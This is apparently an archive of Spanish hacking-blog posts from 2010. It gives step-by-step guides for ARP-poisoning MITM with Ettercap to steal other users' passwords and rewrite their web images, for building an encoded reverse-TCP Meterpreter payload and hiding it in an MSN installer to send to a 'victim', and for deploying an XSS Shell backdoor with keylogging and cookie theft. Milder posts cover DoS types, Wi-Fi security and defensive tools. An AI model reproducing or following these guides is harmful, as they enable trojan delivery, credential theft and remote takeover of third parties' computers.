30 sept 2010

Manual básico Ettercap (entorno gráfico)

Esta es una guia básica sobre la utilización de ettercap. Este programa que nos permite sniffar el tráfico de red y obtener  así las  contraseñas escritas por otros usuarios de nuestra red, además también permite leer, por ejemplo, las conversaciones del messenger u otros programas de mensajería instantánea.

1 - Primero tenemos que descargar el ettercap, la ultima versión es la 0.7.3 y
esta disponible tanto para windows como para linux:

Windows:
http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/

Linux:
http://ettercap.sourceforge.net/download.php

o (en el caso de Ubuntu)
# apt-get install ettercap-gtk

2 - Lo instalamos.

Si tienes la versión para compilar de linux:
# ./configure
# make
# make install

A partir de ahora lo interesante:

3 - Arrancamos el ettercap (en caso de linux como root, ya que sino no nos permitira seleccionar la interfaz de red a utilizar).

4 - Pestaña Sniff>Unified Sniffing

5 - Seleccionamos la interfaz que esta conectada a la red que queremos sniffar,
despues le damos a "Aceptar".

6 - Pestaña Host>Scan for hosts.

En la parte de abajo de la pantalla aparecerá algo como " X hosts added to the hosts list..."
(X sera un numero correspondiente al numero de maquinas conectadas a la red).

7 - Pestaña Host>Host list.

Ahora aparecerán las IPs de las maquinas conectadas, hay que tener en cuenta que el router también aparece (No aparece nuestro PC).

8 - Seleccionamos la IP del ordenador a atacar y pulsamos "Add to Target 1", después el router "Add to Target 2".

Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener en cuenta que vamos a utilizar una técnica llamada Man In The Middle (MITM) y lo que haremos sera que todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si nosotros nos desconectamos sin detener el ataque MITM nuestra víctima se quedara sin conexión por un tiempo, mientras se reinician las tablas arp.

9 - Pestaña Mitm>ARP Poisoning. Ahora marcamos la pestaña "Sniff remote connections" y pulsamos "Aceptar".

10 - Pestaña Start>Start sniffing.

Con esto estaremos snifando el trafico de red.

11 - Pestaña  View>Connections. Aquí podemos ver todas las conexiones y hacemos doble click sobre alguna podemos ver los datos que contiene, entre ellos conversaciones del messenger, usuarios y contraseñas, etc.

Ahora es cuestión de paciencia.

Bueno un saludo a todos y espero que os sirva.

Respeto a los filtros:

Este filtro se utiliza para cambiar las imagenes de la maquina a la que le hayamos hecho el man in the middle.

Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos el script.


El script es el siguiente:
############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

Ahora modificamos la dirección de las imágenes por las que nosotros queramos, por ejemplo la de portalhacker.net, quedaría así:
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
replace("IMG SRC=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
msg("Filter Ran.\n");
}

Lo siguiente sera guardar el script con extension .filter, por ejemplo imagen.filter.

Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una vez allí ponemos y se compilara el filtro:
etterfilter imagen.filter -o imagen.ef

Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
/usr/share/ettercap

Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaña filters->load a filter.

Una vez aquí seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro aplicado y las imágenes que vea la victima serán sustituidas por las que nosotros queramos.

Autor: Aetsu

28 sept 2010

[Video] Escondiendo Meterpreter en un instalador de MSN

Bueno... Recorriendo la web me encuentro con este video que es bastante simple y que explica muy bien como transformar un PAYLOAD a exe y como unirlo a un Instalador de MSN con Iexpress. Para luego enviárselo a la víctima y se conecte a nosotros gracias al PAYLOAD [windows/exploits/reverse_tcp] que crea una conexión inversa (osea que nuestra víctima se conecta a nosotros), lo que es muy práctico para evitar el firewall de Windows. Aquí el video, y luego procedo a explicar a los que no les haya quedado muy claro ya que el video está en inglés, pero muy fácil de entender:




Primero se procede a crear el PAYLOAD con extensión *.exe:
root@evilbox:~# cd /pentest/exploits/framework3/
root@evilbox:/pentest/exploits/framework3# ./msfpayload windows/exploits/reverse_tcp LHOST=192.168.1.64 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/payload.exe
En LHOST=192.168.1.64 se tiene que poner nuestra IP ya que la victima se va a conectar a nosotros.

En -o se pone la ruta donde se guardará el payload.exe, puede ser donde sea.

Se deja corriendo en la consola metasploit:
root@evilbox:/pentest/exploits/framework3# ./msfconsole

Luego se procede a unir payload.exe con el instalador de MSN o en su defecto cualquier exe. No voy a entrar en detalles como usar Iexpress ya que en el video es muy claro.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/exploits/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.64
msf exploit(handler) > exploit
Aquí lo único lo que hay cambiar es set LHOST 192.168.1.64 por nuestra IP, como ya expliqué antes. es para que nuestra víctima se conecta a nosotros.

Corremos el exploit con el comando exploit (obvio no XD)

Por último sólo nos queda enviar el "*.exe" (payload.exe + Instalador de MSN) a nuestra víctima y esperar que lo ejecute.

Ahora tenemos el control absoluto desde nuesta consola del PC de tu víctima.

[+] Salu2
[+] ZioneR

27 sept 2010

SoftPerfect Network Scanner v5.0

SoftPerfect Network Scanner es un escaner gratuito multi-threaded IP, escáner de NetBIOS y SNMP con una interfaz moderna y muchas características avanzadas. Está dirigido a administradores de sistemas y usuarios en general interesados en la seguridad informática. Contiene ping a computadoras, escáneres para escuchar en puertos TCP / UDP y muestra qué tipos de recursos compartidos están en la red (incluidos los ocultos y de sistema).
 
Además, te permite montar carpetas compartidas como unidades de red, navegar por ellos utilizando el Explorador de Windows, filtrar la lista de resultados y mucho más. SoftPerfect Network Scanner también puede comprobar un puerto definido por el usuario e informar si se está abierto. También puede resolver nombres de host y la detección automática de un rango de IP local y externa. Soporta el apagado remoto y Wake-on-LAN.

Principales características:

  • Pings a Computadoras y muestra los activos.
  • Detecta el hardware de direcciones MAC, incluso a través de routers.
  • Detecta las carpetas compartidas y los permisos de escritura.
  • Detecta las direcciones IP internas y externas.
  • Analiza en busca de puertos tcp en escucha, algunos de los servicios UDP y SNMP.
  • Recupera usuarios registrados, configuraciones de cuentas de usuario, el tiempo de actividad, etc
  • Usted puede montar y explorar los recursos de red.
  • Puede lanzar aplicaciones externas de terceros.
  • Se pueden exportar resultados a HTML, XML, CSV y TXT
  • Soporta Wake-On-LAN, apagado remoto y el envío de mensajes de red.
  • Recupera potencialmente cualquier información a través de WMI.
  • Recupera la información de registro remoto, sistema de archivos y gestor de servicios.
  • Es absolutamente gratis, no requiere instalación y no contiene adware/spyware/malware.

Imágenes

Ventana de explorador de la red principal, con algunos resultados del análisis.




El escáner de red puede ser fácilmente configurado a las necesidades del usuario.





Descarga SoftPerfect Network Scanner v5.0
Latest version: 5.0 (Sep 27, 2010)
Plataformas soportadas: Windows 2000, XP, 2003, Vista, 2008, Seven
32-bit and 64-bit
Licencia: Freeware

Web Oficial: http://www.softperfect.com/

[Video] Indetectando Malware by demonio666vip

Bueno... la verdad es un método que tiene mucho tiempo, pero sin duda es muy interesante y fácil de llevar a cabo:




Autor: demonio666vip

25 sept 2010

[Xss Shell] Video + Tutorial

XSS Shell es un poderoso backdoor XSS que permite obtener de forma interactiva el control de un cross-site scripting (XSS) en una aplicación web. Demuestra el poder real y el daño de los ataques de cross-site scripting.

QUE ES UNA SHELL XSS?

XSS Shell es un potente backdoor XSS y un administrador de zombis. Este concepto fue presentado primero por XSS-proxy (http://xss-proxy.sourceforge.net/). Normalmente, en ataques XSS el atacante tiene una oportunidad, en forma interactiva XSS Shell puede enviar peticiones y obtener respuestas de la víctima, tu puedes poner el backdoor en la página.

Puedes robar la autentificación básica, puedes saltarse restricciones de IP en los paneles de administración, puedes realizar un DDoS en algunos sistemas con una vulnerabilidad XSS permanente, etc... posibilidades de ataque son ilimitados con buenas ideas. Básicamente esta herramienta demuestra que se puede hacer más cosas con XSS.

CARACTERISTICAS

XSS Shell tiene varias características para tener acceso a toda víctima. También puede simplemente añadir sus propios comandos.

La mayoría de las características se pueden habilitar o deshabilitar desde la configuración o pueden ser ajustado desde el código fuente.

Características:

  • Páginas de regeneración
  • Keylogger
  • Mouse Logger (click points + DOM actual)

Incorporado en los comandos:

  • Obtener datos con Keylogger.
  • Obtener la página actual (obtener DOM actual / como una captura de pantalla).
  • Obtener Cookie.
  • Ejecutar JavaScript suministrado (eval).
  • Obtener Portapapeles (sólo para IE).
  • Obtener dirección IP interna (sólo Firefox + JVM ).
  • Revisar las víctimas que visitaron el historial de URL.
  • DDoS.
  • Forzar la caída del navegador de la víctima.

INSTALACIÓN

XSS Shell utiliza ASP + base de datos MS Access como backend, pero puedes simplemente ponerlo en cualquier otra solución de servidor. Sólo tiene que seguir con el protocolo de comunicación simple.

Instalar la interfaz de administración:

  1. Copiar "xssshell" carpeta en su servidor web
  2. Copiar "db" a un lugar seguro (por debajo de la raíz)
  3. Configurar "ruta de acceso base de datos" de "xssshell/db.asp"
  4. Modificar fuertemente codificados la contraseña en db.asp [contraseña por defecto es: w00t
  5. Ahora usted puedes tener acceso a la interfaz de administración de algo como http://[YOURHOST]/xssshell/

Configurar XSS Shell para la comunicación:

  1. Abrir xssshell.asp
  2. Elegir la variable "SERVER"  a la carpeta donde se encuentra XSSShell. i.e: "http://[YOURHOST]/xssshell/";
  3. Asegúrese de revisar "ME", "Conexión", "COMMANDS_URL" variables. Si ha cambiado los nombres de archivo, nombres de carpetas o algún tipo de configuración diferente que necesita modificarlos.
Ahora abra su interfaz de administración desde el navegador. Para probarlo, basta con modificar "sample_victim/default.asp" código fuente y reemplazar "http://attacker:81/release/xssshell.js" URL con su propia URL del tipo XSS Shell. Abrir "sample_victim" carpeta en cualquier otro navegador y puede ser subido a otro servidor.
Ahora debería poder ver un zombi en la interfaz de administración. Sólo tiene que escribir algo de texto en el área "parámetros" y haga clic en "alert ()". Usted debe ver un mensaje de alerta en el navegador de la víctima.


Video De Una Xss Shell Funcionando:





Descargar XSS Shell v0.3.9:
http://www.portcullis-security.com/tools/free/XSSShell039.zip
o
http://ferruh.mavituna.com/xssshell/download/xssshellv039.zip


Vía: http://0verflow.diosdelared.com/
Fuente: http://www.darknet.org.uk/

Temas Relacionados:
[BeEFYPROXY] Interceptar el trafico WEB (MITM)
[BeEF] Tutorial

[+] Salu2

[DiosDeLaRed] E-zine #2

Bueno... Hace tiempo que en Diosdelared.com se publicó la segunda E-zine de este foro donde hacen execelentes aportes. En esta E-zine se trata sobre:

  • [Metasploit] Infectando Linux con Troyano.
  • [Metasploit] Sistemas conectados en la misma Red.
  • [Fast-Track + Metasploit] PAYLOAD Automatically Generate.
  • DNS Impersonation.
  • Introducción al HTTP Hacking.
  • Disable_functions & suhosin patch.

Contenidos y Portada:


Descarga E-Zine #2 DiosDeLaRed

Fuente: http://benox.diosdelared.com/

[+] Salu2

22 sept 2010

Tipos de ataques Denial-of-Service (DoS)

 Hace poco en El rincón de dan1t0 subieron un texto explicativo sobre los Denial-of-Service (DoS) bastante bueno y especial para que aprendan de que se tratan, ahí los dejo con el texto:

Un ataque de denegación de servicio (D.o.S.) es un tipo practica bastante común en el mundo de Internet, y se basa en hacer que un servicio o recurso sea inaccesible para los usuarios del mismo mientras dura el ataque, este tipo de ataques suele usarse a veces como distracción de los administradores de red para realizar un ataque más potente con un objetivo más concreto o simplemente dejar cortado un servicio en un momento vital para la empresa. Por lo tanto es bueno conocer qué es, que tipos hay y así poder tener un idea clara de como defenderse de ellos. No solo desde el exterior de la red, sino desde el interior que es donde se produce la mayoría de los ataques actualmente (80%).


  • Ataques de desbordamiento de buffer. Es de los más comunes, se basa en enviar más trafico a una aplicación o dispositivo del que este puede soportar y de esta forma lo colapse. Imaginemos que tenemos un servidor de correo que puede procesar 5 correos por segundo si, desde varias maquinas se envían 20 correos por segundo al servidor de correo este colapsara y quedara inutilizado durante el tiempo que dure el ataque.
  •  Ataque SYN. Para entender este ataque hay que conocer un poco del protocolo TCP, para abrir una conexión entre dos hosts se necesita una sincronización previa entre ambos, para ello el host que quiere conectarse (A) tiene que enviar un paquete de tipo SYN al equipo destino (B), este lo que hace es asignar un espacio en la pila TCP para esa conexión y envía a B  una respuesta, si todo siguiera de forma normal en 3 pasos establecerían una conexion; pero si tu idea es atacar enviarás un mismo paquete SYN desde varios equipos con una IP falsa de origen (spoofing) de tal forma que el servidor atacado envié respuesta a un host desconocido, esto hará que no reciba respuesta y la pila se vaya llenando de conexiones abiertas a la espera, si enviamos masivamente muchos paquetes SYN acabaremos por tirar la red y el host atacado quedará incomunicado.
  •  Ataque Smurf. Este ataque también es muy sencillo de realizar, si no se esta protegido. El ataque smurf se basa en enviar un ping a la dirección broadcast de la red, el ping utiliza el protocolo ICMP, cuando enviamos un ping enviamos un paquete a un host, si el host "esta vivo" nos devolverá el mismo paquete, imaginemos ahora que mediante un generador de paquetes creamos un paquete ping que contenga gran cantidad de información y hacemos spoofing cambiando la ip de origen por la de nuestro host víctima, si tenemos en cuenta que cuando enviamos un ping a la dirección broadcast este es devuelto por todos los host de la red, si enviamos muchos ping conseguiremos que todos ellos sean devueltos masivamente al host atacado y este quede fuera de juego, tened en cuenta además que una red de una empresa puede tener cientos de pc's conectados.
  •  Virus y gusanos. Este tipo de ataques muchas veces no es intencionado o mejor dicho no se elije a la víctima, es decir navegando por la red, descargando archivos de procedencia no segura puedes infectarte con un virus o con un gusano, un virus ataca a un equipo y según su morfología dañara de una u otra forma, y se propagara mediante ubs's, etc. Un gusano se replica por toda la red consumiendo recursos de esta hasta tirarla y dejarla sin servicios. Para realizar este ataque puede conseguir acceder a la red de forma remota y liberar un gusano, puede enviarlo por correo a alguna persona dentro de la red mediante un falso correo útil spoofeando una dirección licita o usar miles de métodos como ingeniería social.
Fuente: http://dan1t0.blogspot.com/

16 sept 2010

[Security Software Downloader] todo lo que necesitas para mantener seguro tu equipo

Una de las primeras cosas que hacemos cuando adquirimos un equipo o instalamos uno desde cero y utilizamos Windows es instalar el antivirus. Pero además, muchas veces queremos instalar más programas de seguridad que nos ayuden a proteger nuestro equipo. Un programa contra espías o herramientas específicas contra el malware que nos ayuden a mejorar la seguridad del equipo. En este caso seguro que os gusta Security Software Downloader, todo lo que necesitas para mantener seguro tu equipo.


Se trata de una aplicación que nos permite el acceso directo a la descarga de un completo grupo de aplicaciones de seguridad que muchos consideramos indispensables para la seguridad de los sistemas Windows. Dispone de un amplio grupo de antivirus gratuitos, y los principales antivirus de pago del mercado, en sus versiones de prueba. Además disponemos de Firewall y otras utilidades de seguridad.

En la configuración de la herramienta de descarga podemos elegir nuestro sistema operativo. La aplicación está disponible para sistemas de 32 y 64 bits que también podemos configurar. Por defecto la aplicación está en automático, de forma que detectará de forma automática el sistema y la versión que utilizamos. Está disponible para Windows XP, Vista y 7. 

Una vez marcadas las aplicaciones que queremos descargarnos nos creará una carpeta en la que irá descargando cada una de ellas para que posteriormente podamos instalar las aplicaciones que hemos elegido. Una vez completadas las descargas nos ofrecerá abrir la carpeta de destino para comenzar con las instalaciones.


La gran ventaja de SSDownloader está en que podemos llevarlo en nuestra memoria USB de referencia y si tenemos que realizar instalaciones en equipo ajenos no tendremos que estar buscando por distintas páginas para descargar, sino que marcaremos las opciones que nos interesan, las descargaremos y a instalar.

Descarga Security Software Downloader

Fuente: http://www.genbeta.com/

11 sept 2010

[Patriot NG] Monitorizar en tiempo real cambios en sistemas Windows

Patriot NG es una herramienta de tipo 'Host IDS' que permite monitorizar en tiempo real cambios en sistemas Windows.

Patriot monitoriza:
  • Claves del registro: Indicando si alguna key sensible (autorun, configuración Internet Explorer ...) es alterada
  • Ficheros en los directorios 'Startup'
  • Nuevos usuarios creados en el sistema
  • Nuevos servicios
  • Cambios en el fichero Host
  • Nuevos trabajos en el 'Task Scheduler' de Windows
  • Alteración de la integridad de Internet Explorer (Nuevos BHOs, cámbios en la configuración ..)
  • Monitorización de la tabla ARP del sistema (prevención de ataques MITM)
  • Nuevos Drivers cargados en el sistema
  • Nuevos recursos compartidos NetBios
  • Protección TCP/IP (Nuevos puertos abiertos, nuevas conexiones realizadas por procesos, detección de PortScans ...)
  • Monitorización de directorios críticos del sistema (Nuevos ejecutables, nuevas DLLs ...)
Alerta
Configuración
Tray
    Es una excelente herramienta para los analizadores de malware o los que quieren seguridad de verdad...

    Patriot NG está en desarrollo, aun le falta algunas cosas, pero promete mucho.

    Descarga  Patriot NG

    Web oficial: http://security-projects.com/

    WIFI by Z3R0N3

    Navegando por ahí me encuentro con un texto de Z3R0N3 bastante interesante donde explica bastante clara y resumidamente el tema de Wifi... Para los que no se manejen mucho les recomiendo esta breve lectura.


    INDICE:
    1. Conceptos Básicos I.
    2. Conceptos Básicos II.
    3. Conceptos Básicos III.
    4. Conceptos Básicos IV.
    5. Conceptos Básicos V.
    6. Conceptos Básicos VI.
    7. Conceptos Básicos VII.
    8. Montaje I.
    9. Montaje II.
    10. Montaje III.
    11. Alcanze y Cobertura.
    12. Seguridad I.
    13. Seguridad II.
    14. Seguridad III.
    15. Seguridad IV.

    Wi-Fi (Wireless Fidelity) es una de las tecnologías de comunicación inalámbrica (sin cables - wireless) más extendidas. También se conoce como WLAN o como IEEE 802.11.

    * Nos podemos encontrar los Subestándares de Wi-Fi que actualmente en el ámbito comercial son:
    1. 802.11b:
      • Pionero en 1999 y actualmente el más extendido.
      • Opera en la banda de los 2.4 GHz.
      • Alcanza una velocidad máxima de 11 Mb/sg.
    1. 802.11g:
      • Estrenado en 2003.
      • Opera en la banda de los 2.4 GHz.
      • Alcanza una velocidad máxima de 54 Mb/sg.


    1. Conceptos Básicos I:
      • Access Point: (Punto de Acceso o AP). Es el dispositivo que hace de puente entre la red cableada y la red inalámbrica. Podemos pensar que es, de alguna manera, la antena a la que nos conectaremos.
    2. Conceptos Básicos II:
      • Accesorio Wi-Fi: Es el accesorio adicional que usaremos para incoporar el estándar 802.11 a nuestro equipo (PDA, ordenador portátil o de sobremesa), en caso de no tener Wi-Fi integrado.
        Estos accesorios pueden encontrarse en formato de tarjetas PCMCIA (para portátil), PCI y USB (para ordenador de sobremesa) y esperamos que muy pronto en formato SD (Secure Digital) para nuestros PDAs Palm OS.
    3. Conceptos Básicos III:
      • Dirección IP: (IP Address): Si, por ejemplo, pensamos en una red local con un router ADSL, los PCs o equipos conectados a la red tendrán sólo IP privada, mientras que el router tendrá una IP pública (su identificación en Internet) y una IP privada (su identificación en la red local).
      • DDirección MAC: (MAC address - Media Access Control address) Es el código único de identificación que tienen todas las tarjetas de red. Nuestro accesorio Wi-Fi o nuestro PDA con Wi-Fi integrado, al ser un dispositivo de red, también tendrá una dirección MAC única.
      • Máscara de subred: (Subnet address) Cifra de 32 bits que especifica los bits de una dirección IP que corresponde a una red y a una subred. Normalmente será del tipo 255.255.255.0
      • Puerta de enlace (Gateway): Es la dirección IP privada de nuestro router.
    4. Conceptos Básicos IV:
      • Servidores DNS: (DNS server): Para no memorizar IP’s tenemos los servidores DNS.Un servidor DNS es un servidor en donde están almacenadas las correlaciones entre nombres de dominio y direcciones IP.   
      • WEP (Wired Equivalent Privacy): Es el tipo de encriptación que soporta la tecnología Wi-Fi. Su codificación puede ir de 64 bits hasta 128 bits. WEP está deshabilitado por defecto.   
      • WPA (Wi-Fi Protected Access): Encriptación dinámica y más segura que WEP, es más reciente.
    5. Conceptos Básicos V:
      • SSID (ESID,BSID) (Service,Extended,Basic Set Identification): Nombre con el que se identifica a una red Wi-Fi. Este identificador viene establecido de fábrica pero puede modificarse a través del panel de administración del Punto de Acceso. 
      • DHCP: Tecnología utilizada en redes que permite que los equipos que se conecten a una red (con DHCP activado) auto-configuren los datos dirección IP, máscara de subred, puerta de enlace y servidores DNS, de forma que no haya que introducir estos datos manualmente. Por defecto la mayoría de los routers ADSL y los Puntos de Acceso tienen DHCP activado.
    6. Conceptos Básicos VI:
      • Infraestructura: Modo de conexión en una red wireless que define que nuestro equipo (PDA, portátil u ordenador de sobremesa) se conectará a un Punto de Acceso. El modo de conexión deberá de especificarse en la configuración de nuestro equipo o del accesorio Wi-Fi. Por defecto viene activado este modo. 
      • Ad-Hoc (Punto a Punto): Modo de conexión en una red wireless que define que nuestro equipo se conectará directamente a otro equipo, en vez de hacerlo a un Punto de Acceso. Ad-Hoc es una forma barata de tener conexión a Internet en un segundo equipo sin necesidad de comprar un Punto de Acceso. Para este uso la configuración se dificulta ya que tenemos que configurar en el ordenador que tiene la conexión a Internet un programa enrutador o una conexión compartida.
    7. Conceptos Básicos VII:
      • CANAL: Es una frecuencia de uso único y exclusivo para los clientes dentro de su cobertura.
        La frecuencia más usada es la de 2.4 Ghz, esta frecuencia es libre en casi todos los países del mundo ya que está reservada para educación, investigación y sanidad. 
        Sin embargo algunas frecuencias dentro de este rango están reservadas para ejércitos o gobiernos. En este dibujo se pueden ver los canales utilizados por algunos países: 
      • Canal 1 - 2.412 Ghz 
      • Canal 10 - 2.457 Ghz 
      • Canal 13 - 2.472 Ghz 
    8. Montaje I:
    9. ¿Qué necesito para montar una red Wi-Fi en casa?
      • Ejemplo de un esquema de montaje:
    10. Montaje II:
      • Configuración del Access Point. Genéricamente (depende del fabricante)
        - 1. Sacar el AP de su caja y conectarlo a la red eléctrica con el alimentador incluido en la caja. 
        - 2. Conectar el AP al router ADSL con el cable cable de red del AP (también incluido en la caja). 
        - 3A. Si tenéis DHCP activado en el router ADSL en principio no habrá que configurar ningún parámetro adicional en el AP. 
        - 3B. Si no tenéis DHCP activado, tendréis que establecer en el AP la IP privada que tendrá, la puerta de enlace (IP del router), la máscara de subred y los servidores DNS.
      • En todos los Puntos de Acceso se puede entrar al panel de administración a través de un navegador web. Algunos incluyen además un programa de Windows para hacer esta configuración.
        En cualquier caso consultar el manual del AP para información detallada.
    11. Montaje III:
    12. Configuración de nuestro equipo:
      • Lo más normal es que tengáis una herramienta de gestión de la conexión Wi-Fi, incluida con el accesorio, donde podáis configurar los parámetros necesarios, así como ver la potencia de la señal.
      • Si tenéis DHCP activado sólo tendréis que abrir este programa, escanear las redes disponibles, seleccionar la vuestra y conectaros a ella. La configuración se realizará automáticamente.
      • Si tenéis DHCP desactivado tendréis que establecer manualmente la dirección IP de vuestro equipo, la puerta de enlace, la máscara de subred y los servidores DNSs. Después de hacer esto abrid el programa de configuración de Wi-Fi de vuestro equipo o del accesorio que hayáis instalado y seguíd los pasos del párrafo anterior.
    13. Alcanze y Cobertura:
      • El alcance de la señal de nuestra red Wi-Fi dependerá de:

        • La potencia del Punto de Acceso.
        • La potencia del accesorio o dispositivo Wi-Fi por el que nos conectamos.
        • Los obstáculos que la señal tenga que atravesar (muros o metal).
      • Cuanto más lejos (linealmente) quieras llegar, más alto deberás colocar el Punto de Acceso. Muchos de los actuales APs vienen preparados para poderlos colgar en la pared.
      • Si quieres llegar lejos, evita también interferencias como microondas o teléfonos inalámbricos.
      • Si la señal te llega debilitada, utiliza un amplificador de señal o si es posible, monta una nueva antena de más potencia al AP (los Puntos de Acceso de gama baja NO lo permiten) o una antena exterior al accesorio (normalmente sólo para formatos PCMCIA o PCI).
    14. Seguridad I:
    15. Consideraciones previas:
      • Los paquetes de información en las redes inalámbricas viajan en forma de ondas de radio. Las ondas de radio -en principio- pueden viajar más allá de las paredes y filtrarse en habitaciones/casas/oficinas contigüas o llegar hasta la calle.
      • Si nuestra instalación está abierta, una persona con el equipo adecuado y conocimientos básicos podría no sólo utilizar nuestra conexión a Internet, sino también acceder a nuestra red interna o a nuestro equipo -donde podríamos tener carpetas compartidas- o analizar toda la información que viaja por nuestra red -mediante sniffers- y obtener así contraseñas de nuestras cuentas de correo, el contenido de nuestras conversaciones por MSN, etc.
      • Si la infiltración no autorizada en redes inalámbricas de por sí ya es grave en una instalación residencial (en casa), mucho más peligroso es en una instalación corporativa. Por esto cada vez hay más redes cerradas.
      • Sin pretender invitaros a hacer nada ilegal, podéis comprobar la cantidad de redes abiertas que podéis encontrar sin más que utilizar el programa o la función Site Survey o escaneo de redes de vuestro PDA con Wi-Fi o de vuestro portátil mientras dáis un paseo por vuestro barrio o por vuestra zona de trabajo.
    16. Seguridad II:
    17. Objetivo: conseguir una red Wi-Fi más segura.
      • El protocolo 802.11 implementa encriptación WEP, pero no podemos mantener WEP como única estrategia de seguridad ya que no es del todo seguro. Existen aplicaciones para Linux y Windows ( WEPCrack) que, escaneando el suficiente número de paquetes de información de una red Wi-Fi, son capaces de obtener las claves WEP utilizadas y permitir el acceso de intrusos a nuestra red.
      • Más que hablar de la gran regla de la seguridad podemos hablar de una serie de estrategias que, aunque no definitivas de forma individual, en su conjunto pueden mantener nuestra red oculta o protegida de ojos ajenos.
    18. Seguridad III:
    19. Estrategias de Seguridad y su Grado de Complejidad:
      1. Cambia la contraseña por defecto. Baja.
      2. Usa encriptación WEP/WPA. Alta.
      3. Cambia el SSID por defecto. Baja.
      4. Desactiva el broadcasting SSID. Media.
      5. Activa el filtrado de direcciones MAC. Alta.
      6. Establece el nº máximo de dispositivos que pueden conectarse. Media.
      7. Desactiva DHCP. Alta
      8. Desconecta el AP cuando no lo uses. Baja.
      9. Cambia las claves WEP regularmente. Media.
      10. Deshabilitar la Wi-Fi en el router, cuando utilicemos cable. Baja.
      Nota1:Es conveniente leer los manuales del PA y el dispositivo Wifi.   Nota2:El observador será el hipotético intruso de nuestra Wifi.  
    20. Seguridad IV:
    21. Asegurar el Punto de Acceso:
      1. Cambia la contraseña por defecto.
        • Todos los fabricantes establecen un password por defecto de acceso a la administración del Punto de Acceso. Al usar un fabricante la misma contraseña para todos sus equipos, es fácil o posible que el observador la conozca.
        • [!] Evita contraseñas como tu fecha de nacimiento, etc. Intenta además intercalar letras con números.
        Aumentar la seguridad de los datos transmitidos:
      2. Usa encriptación WEP/WPA.
        • Activa en el Punto de Acceso la encriptación WEP. Mejor de 128 bits que de 64 bits… cuanto mayor sea el número de bits mejor.
        • Los Puntos de Acceso más recientes permiten escribir una frase a partir de la cual se generan automáticamente las claves.
        • Después de configurar el AP tendrás que configurar los dispositivos Wi-Fi de tu red. En éstos tendrás que marcar la misma clave WEP que has establecido para el AP.
        • [!] Aunque estas claves también se pueden ‘descubrir’, el observador preferirá interceptar una red sin encriptar antes que una encriptada.
      3. Cambia el SSID por defecto.
        • Es igual para todos los equipos y suele ser algo del estilo "default", "wireless", "101", "linksys" o "SSID". Es preferible escoger algo menos atractivo para el observador, como puede ser "Broken", "Down" o "Desconectado".
      4. Desactiva el broadcasting SSID.
        • El broadcasting SSID permite que los nuevos equipos que quieran conectarse a la red Wi-Fi identifiquen automáticamente los datos de la red inalámbrica, evitando así la tarea de configuración manual. Al desactivarlo tendrás que introducir manualmente el SSID en la configuración de cada nuevo equipo que quieras conectar.
        • [!] Si el observador conoce nuestro SSID (por ejemplo si está publicado en alguna web de acceso libre) no conseguiremos nada con este punto.
        Evitar que se conecten:
      5. Activa el filtrado de direcciones MAC.
      6. - Activa en el AP el filtrado de direcciones MAC de los dispositivos Wi-Fi que tengas funcionando. Así solamente los dispositivos con las direcciones MAC especificadas se conectarán a tu red Wi-Fi. [!] Las direcciones MAC se transmiten "en abierto", sin encriptar, entre el Punto de Acceso y el equipo. Por lo tanto se podrían averiguar con algunos programas.
        • Aunque las direcciones MAC son únicas, hay programas que permiten simular temporalmente por software una nueva dirección MAC para una tarjeta de red.
      7. Establece el número máximo de dispositivos que pueden conectarse al mismo tiempo, si el AP lo permite.
      8. Desactiva DHCP en el router y en el AP.
        • En los dispositivos/accesorios Wi-Fi tendrás que introducir a mano la dirección IP, la puerta de enlace, la máscara de subred y el DNS primario y secundario.
        • [!] Si el observador conoce "el formato" y el rango de IPs de nuestra red, no conseguiremos nada con este punto.
        Para los más cautelosos:
      9. Desconecta el AP cuando no lo uses.
        • El AP almacena la configuración y no necesitarás introducirla de nuevo cada vez que lo conectes.
      10. Cambia las claves WEP regularmente.
        • Por ejemplo semanalmente o cada 2 ó 3 semanas. Antes decíamos que existen aplicaciones capaces de obtener la clave WEP de nuestra red Wi-Fi analizando los datos transmitidos por la misma. Pueden ser necesarios entre 1 y 4 Gb de datos para romper una clave WEP. Al llegar a este caudal de información transmitida es recomendable cambiar las claves. Recuerda que tendrás que poner la misma clave WEP en el Punto de Acceso y en los dispositivos que se vayan a conectar a éste.
      11. Por último puedes deshabilitar la Wi-Fi en el router, si hay veces que te conectas con cable.

    Autor: Z3R0N3
    Original: http://indetectables.net/

    4 sept 2010

    [Joomla Scan] Scanner para encontrar la versión de Joomla y posibles vulnerabilidades

    Hace poco pepelux realizó un Scanner para revisar remotamente la versión de Joomla de alguna web y posibles vulnerabilidades para explotarlas con sus respectivos exploits.
    El método usado consiste en comprobar una serie de ficheros que varían de una versión a otra, así como otros que contienen el ID de la última revisión. En resumen, ralizando muchas verificaciones en varios ficheros se llega a acortar el margen entre versiones hasta dar con la exacta.
